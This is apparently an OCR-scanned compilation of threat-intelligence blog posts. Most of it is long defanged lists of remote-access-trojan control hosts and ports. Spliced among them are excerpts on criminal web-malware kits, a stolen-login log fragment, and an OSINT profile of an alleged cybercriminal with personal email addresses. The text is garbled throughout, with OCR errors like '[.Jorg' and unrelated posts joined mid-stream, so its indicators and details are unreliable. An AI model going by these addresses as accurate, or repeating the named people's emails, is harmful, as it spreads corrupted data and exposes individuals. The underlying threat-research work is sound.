77[.]81[.]197[.]144:880 
s3b4s[.]noip[.]me:2180 
winserver[.]dlinkddns[.]com:4444 
hatam[.]no-ip[.]org:8889 
strateg[.]ddns[.]net:1337 
habib1376[.]ddns[.]net:8899 
**s[.]Jddns[.]net:1177 
cccamd[.]myftp[.]biz:5552 
rok13198666[.]no-ip[.]biz:1337 
monitoring007[.]zapto[.]org:1337 
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alabama192837[.]no-ip[.]org:1337 
chrisfo[.]no-ip[.Jorg:1337 
unknownuser[.]no-ip[.]biz:1337 
1987omid[.]ddns[.]net:1616 
khalid-2016[.]noip[.]me:1337 
adobflash[.]hopto[.]org:1177 
samira[.]no-ip[.]biz:3333 
vpnO[.]ddns[.]net:9999 
skituljko[.]Jmooo[.]com:11505 
203[.]189[.]232[.]237:1234 
bahoom.]no-ip[.]biz:2222 
warrirrs[.]no-ip[.]org:1337 
soso[.]noip[.]us:9101 
41[.]38[.]56[.]81:1337 
samoomalik[.]no-ip[.]biz:1337 
hack1111[.]noip[.]me:1337 
droidjack1[.]sytes[.]net:1337 
florian-pc[.]ksueyujOmtxpt6gn[.]myfritz[.]net:1337 
fati43030[.]no-ip[.]biz:9999 
coxiamigo[.]myq-see[.]com:1334 
eldiablo[.]no-ip[.]biz:1337 
hakeerali2[.]Jddns[.]net:1177 
amelwafawl[.]ddns[.]net:1337 
myfrenid2x[.]zapto[.]org:4343 
atsizinoglu[.]duckdns[.]org:1604 
anonymo9s[.]ddns[.]net:1334 
mwanika[.]no-ip[.]biz:81 
androidrat21[.]ddns[.]net:1604 
22134520[.]ddns[.]net:1177 
sherlockholmes[.]duckdns[.]Jorg:75 
win32[.]ddns[.]net:1337 
adelxxbx[.]no-ip[.]biz:9999 
hackermoqtada[.]no-ip[.]biz:1177 
pippo86[.]no-ip[.]biz:9999 
noipjajaja[.]ddns[.]net:4444 


19007 


ahmed2012[.]Jdynu[.]com:1177 
bitoandroid[.]no-ip[.]Jinfo:1337 
droid[.]fagdns[.]com:1604 
androratvirgin[.]duckdns[.Jorg:51 
droidjack228[.]ddns[.]net:1337 
haiderhacer12[.]no-ip[.]biz:9999 
facrbook[.]redirectme[.]net:1337 
madov-matrix25[.]no-ip[.]org:1337 
redcode[.]ddns[.]net:8080 
gert44[.]Jduckdns[.Jorg:51 
testsr[.]ddns[.]net:1334 
mohammad2002[.]no-ip[.]biz:8888 
hasn9999[.]ddns[.]net:1998 
spicymemes|[.]duckdns[.]org:1334 
dantehack[.]zapto[.Jorg:1337 
mohammed22468[.]no-ip[.]biz:1177 
hakeerali2[.]ddns[.]net:2233 
79[.]137[.]223[.]139:1337 
droidss[.]noip[.]me:5552 
jomo[.]zapto[.Jorg:1337 
nassahsliman|[.]ddns[.]net:1000 
alanbkey[.]no-ip[.Jorg:1177 
Sajjadnassar3[.]no-ip[.]biz:4444 
mrgnet[.]ddns[.]net:1604 
nassahsliman[.]ddns[.]net:1337 
htmp[.]sytes[.]net:1622 
iqram85spyl[.]ddns[.]net:1337 
cardangil[.]no-ip[.]org:15963 
engrid[.]no-ip[.]biz:1998 
zal75zk[.]ddns[.]net:1177 
anonymous666[.]zapto[.]Jorg:15963 
sarasisi[.]no-ip[.]org:1337 
blackghostdc[.]duckdns[.]org:1234 
rockrock[.]ddns[.]net:1177 
185[.]32[.]221[.]23:5551 

19008 


duyguseliberkay[.]no-ip[.]biz:1605 
alldebrid[.]duckdns[.]org:1991 
amarok58[.]no-ip[.]biz:1144 
hackhack2016[.]no-ip[.]info:1337 
fati43030[.]no-ip[.]biz:1998 
googles[.]servemp3[.]com:1339 
151[.]246[.]230[.]21:1337 
mohammadhk[.]ddns[.]net:2087 
ala6a[.]no-ip[.]biz:1604 
flashplayerxx[.]no-ip[.]org:1998 
mohamednjrat111[.]no-ip[.]biz:1234 
amran-pc[.]no-ip[.]biz:1337 
androidtool[.]ddns[.]net:1337 
clashdroid[.]no-ip[.]biz:1337 
black1990[.]ddns[.]net:1998 
pruebasernesto[.]ddns[.]net:2669 
31[.]146[.]202[.]169:1336 
dkms[.]ddns[.]net:1337 
gentel901[.]no-ip[.Jorg:1000 
androrat1226[.]ddns[.]net:5000 
karrarhuseein82[.]ddns[.]net:1998 
juanblackhak[.]ddns[.]net:3333 
love2014[.]ddns[.]net:1337 
bannding[.]ddns[.]net:1337 
kingdom[.]no-ip[.]biz:1337 
bensphonetracker[.]ddns[.]net:21 
esharj[.]ddns[.]net:9999 
qwerty1212[.]ddns[.]net:1337 
shahidsajan[.]no-ip[.]biz:1337 
ggwasgeht[.]ddns[.]net:1337 
tedy1993[.]ddns[.]net:1990 
drrazikhan[.]no-ip[.]info:1002 
xzoro2016[.]no-ip[.]Jinfo:1337 
droidjack258[.]bounceme[.]net:1337 
goggle[.]sytes[.]net:1337 


19009 


jkgytgasjg12[.]serveftp[.]com:6666 
owsen[.]ddns[.]net:1337 
mokhter222029[.]ddns[.]net:1177 
r3cxw[.]ddns[.]net:1000 
hassanabd1233[.]ddns[.]net:1997 
learnxea[.]duckdns[.]Jorg:81 
x0S1982[.]ddns[.]net:1177 
137[.]O[.]O[.]1:1188 
martin123456[.]no-ip[.]org:5687 
pianotiles2[.]ddns[.]net:8181 
kskdt[.]ddns[.]net:8857 
94[.]212[.]118[.]115:1609 
momen-swesi[.]no-ip[.]biz:1221 
gooboon. ]no-ip[.]biz:1337 

info[. ]]Joounceme[.]net:1177 
mohsenfaz[.]ddns[.]net:2020 
sevenl[.]ddns[.]net:4444 
topmax[.]myq-see[.]com:1337 
e777kx47[.]ddns[.]net:1337 
testan[.]ddns[.]net:81 
droy[.]zapto[.Jorg:1337 
r90[.]no-ip[.]biz:1337 
androratbtas[.]no-ip[.]info:21 
egytiger[.]Jmyftp[.Jorg:1337 
linonymousami[.]no-ip[.Jorg:5555 
5[.]189[.]137[.]186:1337 
droidjack[.]hopto[.Jorg:1337 
kalinne[.]ddns[.]net:25565 
myawl[.]no-ip[.]biz:1177 
ospr[.]publicvm[.]com:1595 
zxczxczxc[.]ddns[.]net:9001 
changyu231[.]ddns[.]net:1337 
mikestar[.]no-ip[.]biz:1337 
141[.]255[.]144[.]72:1177 
41[.]38[.]56[.]81:9999 

19010 


93[.]104[.]213[.]217:1337 
109[.]73[.]68[.]114:1337 
80[.]136[.]103[.]51:1604 
andver18[.]no-ip[.]biz:1337 
denishul[.]hldns[.]ru:1337 
domiral[.]Jddns[.]net:1337 
an[.]droidsuper[.]su:1400 
emme[.]no-ip[.]biz:1337 
mrm2[.]ddns[.]net:1337 
sarahwygan|.]no-ip[.]biz:1337 
84[.]241[.]6[.]106:9999 
murryapplicazione[.]no-ip[.]org:1337 
188[.]24[.]119[.]27:1337 
msn-web[.]ddnsking[.]Jcom:1505 
testsss[.]ddns[.]net:1337 
sharmayash[.]no-ip[.]biz:1337 
androidalbums[.]ddns[.]net:1337 
azert123[.]ddns[.]net:1337 
alpheron[.]duckdns[.]org:1337 
misty255[.]no-ip[.Jorg:81 
williettinger[.]cc:1337 
dangerlove[.]no-ip[.]biz:9999 
applecenikosmos[.]hldns[.]ru:1337 
helloandroid[.]no-ip[.]org:1177 
teolandia[.]no-ip[.]biz:20021 
thegangsterrap[. ]noip[.]me:1337 
RATForAndroid[.]ddns[.]net:1337 
vikas[.]no-ip[.]biz:1606 
alkingahmed555[.]ddns[.]net:1177 
androrat[.]servegame[.]com:25565 
bapforall[.]ddns[.]net:1337 
androidan[.]ddns[.]net:1337 
newxor2[.]no-ip[.Jorg:1001 
pars[.]ddns[.]net:1337 
draagon[.]ddns[.]net:1337 
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http://108[.]61[.]211[.]219/fbc/get[.]php 
njesra[.]ddns[.]net:1337 
trythelast[.]no-ip[.]Jorg:1500 
dogecoinspeed[. ]zapto[.]org:1337 
sondres1[.]ddns[.]net:1337 
zongkahani[.]no-ip[.]biz:300 
hehe[.]Jduckdns[.Jorg:5657 
106[.]51[.]163[.]232:1337 
wogusnb[. ]no-ip[.Jinfo:1337 
cjbksOuO[.]no-ip[.Jorg:1337 
a[.]tomx[.]xyz:1339 
hacker-81[.]no-ip[.]biz:1337 
reddemon[.]ddns[.]net:1998 
2[.]25[.]171[.]244:1337 
hamker[.]ddns[.]net:88 
cybercrysis[.]ddns[.]net:1337 
pimpdaddy[.]myq-see[.]com:1337 
habbo[.]no-ip[.Jorg:1234 
islam2020libya[.]no-ip[.]biz:1177 
saiber-far68[.]ddns[.]net:81 
system32[.]com:3333 
1337ace[.]ddns[.]net:4321 
diceedicee[.]ddns[. ]net:1337 
microsoft-office[.]ddns[.]net:1337 
albash2222[.]ddns[.]net:1177 
omar[.]no-ip[.]biz:1337 
magemankoktelam[.]ddns[.]net:1337 
188[.]166[.]76[.]144:1337 
88[.]150[.]149[.]91:1332 
hardstyleraver[.]no-ip[.]org:1604 
gold5000[.]ddns[.]net:1604 
yuosaf1993[.]ddns[.]net:1144 
miltin2[.]no-ip[.Jorg:2528 
noiphackk[.]ddns[.]net:1177 
187[.]180[.]186[.]181:9999 
19012 


A tiny 20kb antivirus module within "yet another web based malware in the wild", promises to 
get rid of all Zeus variants, and also, detect and remove rootkits found on the infected system 
in order to ensure that it’s the only malware the victim remains infected with. What’s really 
special about its command and control interface is that it’s AJAX based, with the seller pitching 


the feature as "you no longer have to hit F5 in order to see how’s your malware campaign 
doing”. 
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andro0161[.]no-ip[.]Jinfo:2045 
mehost[.]ddns[.]net:1337 
motoshi[.]zapto[.]org:1337 
shahabhacker[.]ddns[.]net:81 
186[.]81[.]50[.]145:25565 
cricbot[.]no-ip[.]info:1336 
servidor23[.]ddns[.]net:9099 
usa2222[.]ddns[.]net:10 
tataline[.]hopto[.]org:1337 
aerror[.]no-ip[.]biz:5552 
androrat[.]zapto[.]Jorg:25566 
baby[.]webhop[.]me:1177 
darweshfis[.]no-ip[.]org:1110 
hazhar77[.]no-ip[.]biz:9999 
88[.]150[.]149[.]91:1333 
appmarket[.]servehttp[.]com:1337 
189[.]174[.]125[.]60:21 
haxor[.]hopto[.]org:1337 
1349874791[.]gnway[.]cc:1337 
sabbah[.]duckdns[.Jorg:81 
thekillers[.]ddns[.]net:9999 
abdouoahmed[.]ddns[.]net:1337 
danialmostafaei[.]no-ip[.]biz:8899 
jNkey[.]ddns[.]net:1711 
anonvirus[.]ddns[.]net:82 
elisou19[.]ddns[.]net:1337 
momo2015[.]duckdns[.Jorg:1331 
younix[.]ddns[.]net:1199 
sajadianh[.]ddns[.]net:666 
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Here’s a brief (translated) description : 


- Simultaneously execute different campaigns, allocate specific bots for specific countries only, 
set time and data for automatic update with the new binaries 

- Firewalls and antivirus bypassing capabilities, Anti-tracing, anti-reverse engineering 

- Self defense mechanism for harder removal 

- ICQ notifications for finished tasks, newly infected hosts, graphical statistics 
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tak[.]no-ip[.Jinfo:1337 
svn-01[.]ddns[.]net:1337 
persir[.]no-ip[.]biz:81 
mahdi3141[.]ddns[.]net:1337 
151[.]72[.]17[.161:1604 
toyman6699[.]no-ip[.]info:9999 
toyman6699[.]no-ip[.]info:1337 
carapuce-2015[.]no-ip[.]biz:5552 
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dexonic[.]duckdns[.]org:1337 
indusvOO[.]duckdns[.]org:1337 
androidupdate[.]ddns[.]net:8084 
222[.]168[.]1[.]2:1991 
mobilesOft[.]no-ip[.]org:1337 
justarat[.]noip[.]me:200 
zaliminxx[.]duckdns[.Jorg:2222 
kararkarar0780[. ]ddns[.]net:1998 
mohamedhg[.]no-ip[.Jorg:5552 
haa7aah[.]no-ip[.]biz:1337 
aasxzxdsc12324[.]no-ip[.]biz:1998 
hackme[.]no-ip[.Jorg:1122 
matgio[.]duckdns[.]org:1403 
183[.]82[.]99[.]133:1337 
kasofe123123aa[.]no-ip[.]biz:81 
dionis[.]ddns[.]net:2892 
android[.]no-ip[.Jorg:1000 
31[.]210[.]117[.]132:1355 
fenon158[.]ddns[.]net:81 
droidjackv5[.]ddns[.]net:1337 
villevalo[.]chickenkiller[.]Jcom:1337 
securepurpose[.]no-ip[.]info:1337 
somenormalguy[.]duckdns[.]org:7777 
hussein1889[.]no-ip[.]biz:1177 
goog2[.]no-ip[.]biz:1177 
93[.]82[.]129[.]5:16304 
shoo2018[.]no-ip[.Jorg:1337 
37[.]239[.]8[.]89:5552 
makarand[.]no-ip[.]org:81 
hazhar77[.]no-ip[.]biz:1337 
randsnaira[.]dnsdynamic[.]com:1337 
maskaralama[.]ddns[.]net:9996 
khantac[.]ddns[.]net:1337 
hachim07reg[.]no-ip[.]Jinfo:1337 
telegram-tools[.]no-ip[.]biz:81 
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glaive24[.]no-ip[.]biz:81 
suckmordecock[.]duckdns[.]Jorg:51 
100009755836320[.]no-ip[.]biz:1337 
mahasiswa[.]no-ip[.]biz:1337 
liquidixen[.]ddns[.]net:1337 
komplevit-rat[.]ddns[.]net:1337 
188[.]3[.]13[.]98:1024 
diener123[.]ddns[.]net:4545 
alfazaai99[.]ddns[.]net:1337 
93[.]79[.]212[.]194:1337 
sosg77[.]ddns[.]net:1604 
kalizinho[.]no-ip[.Jorg:443 
hardik[.]no-ip[.]Jinfo:1676 
fazoro66[.]ddns[.]net:1177 
androrat1[.]no-ip[.]biz:6956 
bassamzeyad[.]ddns[.]net:8080 
androrat143[.]no-ip[.]biz:143 
1756mostacc[.]ddns[. ]net:80 
132[.]72[.]81[.]164:1234 
volnado[.]sytes[.]net:9999 
68[.]189[.]1[.]254:1050 
411022356:9999 
rustyash[.]no-ip[.]biz:1337 
wxf2009817[.]f3322[.]net:2015 
hax[.]no-ip[.]Jinfo:1337 
anonsa[.]ddns[.]net:81 
sniper-f[.]ddns[.]net:1337 
mohamed46565656[.]no-ip[.]biz:1998 
137[.]O[.JO[.J1:1177 
nademhack[.]no-ip[.Jorg:1177 
androoid[.]ddns[.]net:9090 
81[.]4[.]104[.]129:7331 
voda[.]no-ip[.]Jorg:1337 
pfijsp[.]noip[.]me:2001 
fakaelite[.]no-ip[.]org:1337 
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elgen1[.]no-ip[.]biz:9999 
jokerbabell[.]no-ip[.]biz:1177 
futurasky[.]no-ip[.]biz:1337 
dodee97dodee[.]ddns[.]net:9721 
42[.]236[.]159[.]93:6670 
kilasx[.]ddns[.]net:1337 
85[.]202[.]29[.]79:1155 
07726657423zaion[.]no-ip[.]biz:2015 
winlogen[.]duckdns[.]org:1337 
th3expert[. ]3utilities[.]com:1337 
46[.]45[.]207[.]81:1337 
crime[.Jddns[.]net:9999 
bambi[.]no-ip[.]biz:1337 
93[.]157[.]235[.]248:1337 
178[.]20[.]230[.]44:1337 
mjhooollltuuu[.]no-ip[.]biz:9999 
skipy[.]ddns[.]net:2020 
nexmopro830[. ]ddns[.]net:1604 
lbossn[.]ddns[.]net:1337 
karasqlee9[.]no-ip[.Jorg:1234 
goldeneagle1112[.]ddns[.]net:1998 
asdqqa[.]bounceme[.]net:1337 
151[.]56[.]227[.]79:1604 
106[.]219[.]57[.]228:81 
46[.]186[.]155[.]219:1337 
samdzbba[.]ddns[.]net:5252 
hamadagentel[.]ddns[.]net:1998 
ayadd19[.]no-ip[.Jorg:1177 
authd[.]ddns[.]net:9999 
anonfox[.]no-ip[.]org:1337 
89[.]95[.]11[.]159:9999 
recycled[.]no-ip[.]org:2186 
mezoo32[.]no-ip[.]biz:1177 
41[.]143[.]69[.]230:4444 
178[.]124[.]182[.]38:6666 
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wildu[.]ddns[.]net:1337 
sajjad1994[.]ddns[.]net:1998 
barish121[.]no-ip[.]org:9999 
aymencossassi[.]ddns[.]net:1177 
makarand[.]no-ip[.Jorg:1337 
qq376552030[.]ddns[.]net:1337 
silenthunter3021[.]no-ip[.]org:7890 
alaa-1982[.]no-ip[.]biz:1998 
84[.]101[.]0[.]49:1604 
131[.]117[.]235[.]35:9999 
asosha4ed[.]no-ip[.]biz:9999 
88[.]247[.]226[.]120:1337 
79[.]141[.]163[.]20:1177 
yelp01[.]f3322[.Jorg:2015 
kaddress[.]ddns[.]net:1337 
ignoredhost[.]no-ip[.]biz:5005 
goog2[.]no-ip[.]biz:9999 
forcehackinglove[.]ddns[.]net:999 
simbabweratte[. ]hopto[.]org:81 


heroeschargehacked[.]ddns[.]net:1337 


elvis2015[.]ddns[.]net:21 
aymen1852[.]ddns[.]net:1998 
saral7911[.]no-ip[.Jorg:1337 
freeann[.]sytes[.]net:1222 
facrbook[.]redirectme[.]net:8080 
testtwo2[.]ddns[.]net:1337 
dadadadadaprivet[.]ddns[.]net:20000 
5551520[.]no-ip[.]biz:9999 
s3rv3randrOid[.]no-ip[.]biz:9999 
105[.]106[.]49[.]154:1337 
tom928[.]no-ip[.]biz:1337 
shabbushah[.]duckdns[.]org:1337 
horcheni123[.]ddns[.]net:8080 
horcheni123[.]ddns[.]net:80 


arman[.]no-ip[.]biz:80 
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**you[.]duckdns[.]org:1060 
mpt1969[.]ddns[.]net:2000 
husseinali5698[. ]ddns[.]net:1998 
droid[.]deutsche-db-bank[.]ru:7418 
dj[.]Jshop[.]tm:8080 
mohammedwasib[.]ddns[.]net:81 
kamlabhail23[.]no-ip[.]biz:4455 
howie96[. ]jios[.]org:1623 
bmt96[.]noip[.]me:1604 
hamed1993[.]ddns[.]net:81 
aaaa[.]com:1337 
xmohcine[.]ddns[.]net:1337 
huntergold[.]no-ip[.]biz:1337 
iraqn6777[.]ddns[.]net:1998 
109[.]95[.]56[.]22:81 
107[.]151[.]193[.]126:1337 
hhamokchal[.]ddns[.]net:1337 
dnsdynamic[.]org:1337 
fruby[.]zapto[.Jorg:1337 
telegram-stickers[.]noip[.]me:8811 
karasqlee9[.]no-ip[.]lorg:4000 
alihoseini[.]no-ip[.]biz:81 
195[.]2[.]239[.]147:1488 
shanks[.]no-ip[.]biz:2020 
ninabounita[.]ddns[.]net:5552 
hashOr[.]no-ip[.]biz:81 
109[.]122[.]41[.]237:1024 
anagliz[.]ddns[.]net:81 
stuxOnet[.]no-ip[.Jorg:1337 
puplicdsl[.]ddns[.]net:8080 
charifol310tok[.]no-ip[.]biz:5552 
mahamadmahmod[.]ddns[.]net:1177 
C1[.]no-ip[.]biz:1177 
aldnkoich11111111[.]no-ip[.Jorg:1337 
174[.]127[.]99[.]232:81 
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Exactly how it removes rootkits remains yet unknown due to its proprietary nature and brief 
description, but resetting the hosts file and taking advantage of updated BHO list of known 
malware are among the ways it removes competing malware. 


4.10.2 Copycat Web Malware’ Exploitation Kit Comes’ with Disclaimer 
(2008-10-02 09:58) 
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drdamar[.]hopto[.]org:9999 
x64-windows[.]ddns[.]net:1337 
box100[.]ddns[.]net:5552 
androjan[.]ddns[.]net:88 
tedal1[.]zapto[.]org:1337 
canaria[.]no-ip[.Jinfo:1177 
rumpelztinzkin[.]sytes[.]net:80 
hdkhanh123[.]no-ip[.Jorg:1337 
92[.]243[.]68[.]167:9999 
korg600[.]no-ip[.]biz:1337 
hackcam[.]zapto[.Jorg:1337 
xyz2145[.]ddns[.]net:1333 
moussa-hak[.]no-ip[.]biz:1337 
cyberbwarrior[.]ddns[.]net:1337 
sheamusking34[.]no-ip[.]biz:1991 
hackcam[.]zapto[.]org:9999 
warl10ck[.]serveftp[.]com:6555 
osammer0asmam3al[.]ddns[.]net:2012 
hackdeam[.]no-ip[.]info:1328 
rafkin85[.]ddns[.]net:3333 
android1[.]ddns[.]net:1027 
81[.]177[.]33[.]218:1337 
micro-soft[.]no-ip[.]biz:1737 
24[.]172[.]28[.]155:8080 
droidjack33[.]no-ip[.]biz:1774 
anonymousip[.]ddns[.]net:69 
atin[.]ddns[.]net:81 
31[.]210[.]69[.]156:1337 
tedal1[.]zapto[.]org:1177 
brave-hacker[.]no-ip[.Jorg:4554 
berkani0O774[.]no-ip[.]org:9999 
abusako[.]no-ip[.]biz:1337 
thaer[.]no-ip[.]biz:1337 
medo7911[.]ddns[.]net:1337 
proview[.]ddns[.]net:1066 
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proview[.]ddns[.]net:1026 
anonymousip[.]no-ip[.Jorg:1337 
2[.]190[.]167[.]83:80 
sersaisal[.]ddns[.]net:1337 
hack-irag[.]no-ip[.Jinfo:1337 
guru123[.]ddns[.]net:1337 
sofemm|.]no-ip[.]biz:1177 
islamwayl[.]no-ip[.Jinfo:1998 
100[.]1[.]254[.]38:8080 
sava33[.]ddns[.]net:1337 
rat[.]capsulelab[.]us:8080 
kurd-kar[.]ddns[.]net:1998 
noussa[.]no-ip[.]biz:1337 
droidjack33[.]no-ip[.]biz:1337 
x300x300xx[.]no-ip[.Jorg:1337 
invisibleghost[.]no-ip[.]biz:7722 
45df36[.]dyndns[.]info:1337 
120[.]O[.]O[.J1:55 
shakaky[.]ddns[.]net:9999 
sandhusim001[.]ddns[.]net:1337 
ghfx1[.]Jddns[.]net:1117 
androtorma[.]ddns[.]net:443 
61[.]131[.]121[.]195:9999 
freeeeeeeeee[. ]no-ip[.]Jinfo:1337 
191[.]239[.]107[.]56:9999 
109[.]165[.]69[.]25:1337 
mariorossi2013[.]Jhomepc[.]it:1337 
shop10[.]ddns[.]net:1337 
78[.]169[.]63[.]163:9987 
thelostan[.]ddns[.]net:1177 
redckard[.]ddns[.]net:1234 
asadhashmil.]ddns[.]net:1604 
liquidstone[.]ddns[.]net:1604 
androratttt[.]no-ip[.]org:4477 
zakool1[.]zapto[.]org:1337 
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whatsradar[.]no-ip[.]biz:81 
haker33sadekgafer[.]no-ip[.]biz:1177 
foxfeline[.]no-ip[.Jorg:1974 
cnw[.]redirectme[.]net:1337 
andqip[.]ddns[.]net:7722 
injectman[.]no-ip[.]info: 1337 
93[.]185[.]151[.]217:3333 
service[.]zosys[.]net:1337 
kontolanime[.]no-ip[.]biz:1994 
ssxdswe[.]no-ip[.Jorg:5552 
dsf[.]no-ip[.]org:1337 
tobytori18[.]myftp[.Jorg:6969 
mzgerges[.]no-ip[.]biz:1337 
dj123[.]no-ip[.Jorg:7648 
setts[.]no-ip[.Jorg:25565 
201[.]124[.]95[.]7:21 
xomro[.]no-ip[.]biz:1316 
hacker-321[.]no-ip[.]biz:1177 
chanks[.]no-ip[.]biz:1177 
photoeditor[.]Jddns[.]net:25565 
papasystem[.]no-ip[.Jorg:1337 
moha55[.]no-ip[.]biz:7070 
mazxor[.]zapto[.Jorg:101 
test[.]no-ip[.]org:1337 
monOO09[.]no-ip[.]biz:1337 
yossf2014[.]no-ip[.]biz:1337 
miioolinase[.]ddns[.]net:1337 
abedjaradat1177[.]no-ip[.Jorg:1337 
housan|. Jlinkpc[.]net:1555 
88[.]164[.]37[.197:1337 
moep004[.]no-ip[.Jorg:9999 
aaaaaaaaaabbbbb[.]hopto[.Jorg:1177 
satahezub[.]no-ip[.Jinfo:1337 
craxyvirux[.]ddns[.]net:1337 
46[.]223[.]99[.]222:25566 
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mster0102[.]no-ip[.]biz:1604 
14lcolombo[.]ddns[.]net:1337 
snopil.]no-ip[.]biz:1177 
androidplay[.]ddns[.]net:3333 
gcafegood2[.]noip[.]me:9911 
evilcasper[.]ddns[.]net:1337 
samersamerz[.]no-ip[.]biz:9999 
usa20002015[.]ddns[.]net:9999 
gcafegood[. Jnoip[.]me:9999 
andro[.]no-ip[.]biz:1337 
ghghghghetrezwI[.]no-ip[.Jorg:1337 
dagohack[.]no-ip[.]Jme:4230 
samy/777[.]no-ip[.]biz:9999 
161[.]202[.]108[.]108:1234 
watzeb[.]ddns[.]net:1337 
197[.]35[.]22[.]37:222 
ivon9393[.]no-ip[.]org:1337 
hackedonal[.]ddns[.]net:1990 
facbookserver[.]ddns[.]net:1991 
bostanoo[.]ddns[.]net:1337 
playstore[.]ddns[.]net:2515 
free**[.]duckdns[.Jorg:9090 
41[.]251[.]251[.]7:1999 
moein1369[.]no-ip[.]biz:81 
facebooh[. ]zapto[.Jorg:2525 
79[.J170[.154[.]154:1177 
losever2[.]no-ip[.]biz:8888 
apolo30[.]no-ip[.]org:9999 
amujeeb1990[.]ddns[.]net:4545 
zecovpnhasan1123[.]ddns[.]net:1177 
zadehasan1[.]ddns[.]net:1177 
hpwdza47o8hucl1xj[.]myfritz[.]net:5554 
replace[.]duckdns[.]Jorg:51 
aliyusef6[.]no-ip[.]biz:1337 
85[.]136[.]243[.]80:1337 
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audreysaradin[.]no-ip[.]org:1025 
androkhan3100[.]ddns[.]net:1177 
msupdate[.]myvnc[.]com:88 
fairylow[.]no-ip[.]biz:1337 
zola123[.]no-ip[.]biz: 1604 
hamidoranis[.]no-ip[.]biz:1337 
lomo[.]Jcom:1520 
jastn[.]ddns[.]net:1337 
darkshion[.]no-ip[.]org:1000 
ttn10[.]no-ip[.Jorg:1337 
samsung|[.lapps[.]linkpc[.]net:1337 
jalldomain[.]ddns[.]net:8080 
82[.]223[.]31[.]121:1337 
megalol[.]chickenkiller[.]Jcom:5192 
sammuiyer[.]ddns[.]net:1337 
xatar12[.]ddns[.]net:1337 
scropion20078[.]no-ip[.]biz:1337 
yorkiepet[.]ddns[.]net:1337 

vb[. ]blogsyte[.]com:9090 

Stay tuned! 


1. https://blogger .googleusercontent .com/img/a/AVvXsEimwYoQUey_mQH1y7yfgoWYZ1bHAMG j SG6ZympNWs601btF11iZ7nUwl j 
aReo_NfZYZdP6AqX4W_yuJ_V14SvZyhONvrOnoHp6aDXL22XX7hqO 


18.1.30 Profing FBI’s Most Wanted Cybercriminal Mujtaba Raza from Forwarderz and 
SecondEye Solution - An OSINT Analysis (2022-01-28 14:50) 


[1] 


In this post I’ve decided to offer in-depth and practical and relevant OSINT analysis of FBI’s Most 
Wanted Cybercriminal [2]Mujtaba Raza from the Forwarderz and SecondEye Solution fake docu- 
ments and IDs selling Pakistan-based rogue fraudulent and malicious online enterprise with the 
idea to assist U.S Law Enforcement on its way to track down and prosecute the cybercriminals 
behind these campaigns. 
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shy4angels@gmail[.]Jcom 
shahzadsmb@gmaill.]Jcom 
khizarhl1@yahoo[.]com 
khizarhayat[.]jaffri@yahoo[.]Jcom 
muhammadkhizar[. ]hayatjaffri@yahoo[.]com 
mygreentree59@yahoo[.]com 
khizarl4hayat@gmail[.Jcom 
muhammadkhizarhayatjaffri@yahoo[.]Jcom 
threatcc@gmail[.]Jcom 
mujtaba@forwarderz[.]Jcom 
syedaliraza940@gmail[.]Jcom 
raza[.]zaidi92@yahoo[.]com 

kool boy92@hotmail[.]Jcom 
s[.Jalirz92@gmail[.Jcom 
alimohsin228@gmail[.]Jcom 
mohsinrazaamiri@gmail[.]com 
alimohsin228@yahoo[.]Jcom 
amestypezx@yahoo[.]com 
mohsin@forwarderz[.]com 

great _guy1102002@yahoo[.]Jcom 
support@secondeyesolution[.]com 
info@forwarderz[.]Jcom 
forwarderz@yahoo[.]com 
forwarderzlive@google[.]com 
forwarderzlive@hotmail[.]com 
support@secondeyehost[.]com 

Sample Web sites known to have been used by Forwarderz and SecondEye Solution: 
hxxp://secondeyesolution[.]su 

hxxp:// secondeyesolution[.]ch 

hxxp:// secondeyesolution[. ]ru 

hxxp:// secondeyesolution[.]com 

hxxp:// forwarderz[.Jcom 

hxxp:// secondeyehost[.]com 

Sample screenshots of various Forwarderz and SecondEye Solution domains include: 
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Such disclaimers make you wonder what’s the point of including a notice forwarding the 
responsibility for the upcoming cybercrime activities to the buyer, when the seller himself is 
offering daily updates with undetected bots, and is promising to include new exploits within 
the kit. 


For the time being, this recently released copycat web exploitation malware kit, includes 


two PDF exploits, IE snapshot, and naturally MDAC, with a DIY builder for the binary. Here’s 
the disclaimer, greatly reminding us of [1]Zeus’s copyright notice : 


1907 


"Purchasing this product, you hold the full responsibility for its usage and for consequences 
which may have been caused by incorrect usage or the usage with some evil intent or violation 
of the usage rules. The author excludes the placement of the scripts somewhere on the Inter- 
net, you can only place them on localhost, virtual machine or on a test botnet (minibotnet). 
WARNING! The usage of this product with evil intent leads to the criminal responsibility!" 
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What happens when the buyer tries to resell the kit? - "/f you try to resell, decode, remove the 
boundaries, you will lose all the support, updates and guarantees." which is surreal considering 
that the kit is open source one, and just like we’ve seen with a recent modification of Zeus if 
it were to include unique features - which it doesn’t - others would build upon its foundations. 


Total stats 


Unig visits Exploited Percent 


S stats 


Visits Exploited Percent | Brows 


Going through the exploitation statistics of a sample campaign, you can clearly see that 
out of the 859 unique visits 250 got exploited with outdated and already patched vulnerabil- 


ities. Therefore, diversifying the exploits set would have increased the number of exploited 
hosts. 
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With IE6 visitors exploited at 46 % as a whole, it would be hard not to notice that just like 
Stormy Wormy’s historical persistence of using outdated vulnerabilities, a great majority of 
today’s botnets have been aggregated using old exploits. 


Trying to enforce the intellectual property of a malware kit means you’re claiming own- 
ership, and therefore the disclaimer becomes irrelevant. 


1. http: //www.theregister.co.uk/2008/04/28/malware_copyright_notice/ 


4.10.3 Monetizing Infected Hosts by Hijacking Search Results (2008-10-02 14:33) 
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4 ? 
PORTA BD an 


7028 ka @aiin: http.txt 


0: 9269/cerogna: 1248|M online: 38 


t| pass"h4623611 


wuy. -cu/ index.php? login=yes| DATE: AUTH_FORM=Y| TYPE=AUTH| USER_LOGIN= 
USER_PASSWUORD=: |Login= BoxTu 


When logs with accounting data are no longer of interest due to low liquidity on the under- 
ground market, monetization of the infected hosts comes into play. 


This web based malware seems like an early BETA aiming to scale, however it’s only 
unique features are its ability to hijack the infected user’s searches and server relevant ads 
courtesy of the affiliate networks the administrator participates in, and also, an integrated 
DDoS module that the author simply stole from another kit. Strangely, it’s 2008 yet the author 
also included the ability to turn on the telnet service on an infected host. 


1911 


CK@Y4aTb HK 3aNnyCTHTb 


WM Ounwatb KyKH pn cTapTe. 
W@ Bkniouarp Telnet cepsnuc. 
aH, B Spay3¢ 


DbIX OTKPbIBaTb 


> N cTpa 


Coxpaxums 


With the search queries feature easy to duplicate by other kits, this web based malware is a 
great example of how the time-to-market mentality lacking any kind of personal experience - 


the malware cannot intercept SSL sessions compared to the majority of crimeware kits that 
can - ends up in a weird hybrid of random features. 


Namea Modify 


16.09.20 


